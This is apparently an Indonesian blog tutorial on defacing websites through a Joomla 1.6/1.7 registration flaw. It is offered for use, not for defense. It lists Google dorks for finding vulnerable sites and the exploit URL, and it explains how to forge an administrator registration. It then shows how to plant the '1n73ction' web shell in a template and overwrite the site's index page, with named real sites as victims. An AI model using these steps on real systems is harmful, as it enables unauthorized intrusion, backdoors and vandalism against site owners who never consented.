Cara Deface Web menggunakan Exploit Joomla
Seiring berjalannya waktu kali ini saya akan mempostingkan Cara Deface Web menggunakan Exploit Joomla .
1. Download dulu xploit joomla
Exploit 1
Exploit 2
Exploit 1 atau 2 sama saja,cuma beda tampilanya aja kok... :D
dan download shell 1n73ction Disini
Dork:
inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
inurl:index.php joomla! 1.7 - open source content management site:
inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
intext:joomla! 1.7 - open source content management site:jp
inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
inurl:index.php/19-sample-data-articles/joomla site:com
Jangan Lupa Dork kembangin lagi :)
Exploit :
index.php?option=com_users&view=registration
selanjutnya cari target vuln dengan dork diatas. yang kalian perlu tau perbedaan site vuln dengan tidak vuln liat gambar berikut :
website tidak vuln terhadap Joomla |
website vulm |
lalu kita exploit sehingga menjadi http://esv.be/%20index.php?option=com_users&view=registration
dan tampilanya menjadi seperti gambar
setelah itu tekan ctrl+u dan kemudian tekan ctrl+f lalu ketik "hidden" (tanpa tanda petik)
dan cari kode seperti yang saya tunjuk panah merah itu
setelah ketemu,buka file xploit yang kamu download tadi buka ke notepad,lalu copy code yang seperti digambar diatas dan pastekan di file exploit tadi. lihat gambar
ok setelah itu copy juga url web target http://gym-megal.tri.sch.gr dan pastekan di file exploit. lihatr gambar
nb: ganti tulisan test@gmail dengan alamat gmail kamu,atas bawah harus sama ya... :) ok lanjut
setela itu klik save.
kemudian cari dimana kamu menyimpan file exploit tadi dan klik 2 x isikan username passwordnya (harus tidak sama supaya kita dibawa ke halaman register) dan klik Register
Nanti kalian akan dibawa ke halaman register lagi. isi passwordnya sesukamu. lihat gambar
dan link konfirmasi akan dikirim ke email kamu.
sekarang kita buka email kita liaht pada kotak masuk apakah sudah terkirim link konfirmasi apa blm
ok setelah link konfirmsi msuk ke email kita kita klik link nya. Lihat gambar
setelah di klik nanti akan di arahkan kesini. lihat gambar
isikan user name : genesis
password : manuk
sesuai dengan yang di email yang kita terima tadi, setelah login akan seperti ini. lihat gambar
Ok registrasi selesai,,,ada pertanyaan sampai sini..???
kalu ga ada kita lanjut ke halaman administratornya http://esv.be/administrator/
Masukkan username : genesis
dan pssword : kacang
lalu klik login
daaaaannn...taraaaaaaa kita masuk ke cpanelnya
lalu klik pada template nya seperti yang saya kasih tanda panah merah itu.
setelah itu klik templates yang saa beri panah seperti pada gambar di bawah
pilih satu template.kali ini saya memilih "atomic"
setelah di klik lalu klik Wijzigen hoofdpagina template lihat gambar
hapus smua code yang ada pada kotak tersebut
ok...sekarang buka file shell yang kalian download tadi. klik kanan open with notepad.
kopi code script shellnya dan pastekan di kotak tadi lalu klik save. Lihat gambar
jika shell tertanam dan suk sukses akan seperti gambar
saatnya memanggil shell, jadi perintahnya http://esv.be/templates/atomic/index.php dan enter maka akan ada tampilan backdoor. setelah itu tekan Tab pada keyboart atau arahkan kursor ke tengah yang saya beri tanda panah.Lihat gambar
dan masukan paswordnya 1n73ction dan enter. Lihat gambar
setelah itu anda akan melihat tampilan shell.
setelah itu klik atomic.lihat gambar
cari index.php dan klik edit .Lihat gambar
haspus semua code yang da di dalam kotak dan ganti dengan script deface kamu. Lihat gambar
ubah /customers/4/9/f/esv.be/httpd.www/templates/atomic/index.php menjadi /customers/4/9/f/esv.be/httpd.www/index.php dan klik save.
setelah itu buka url webnya dan silahkan di show offin
hasil esv.be/
sumber: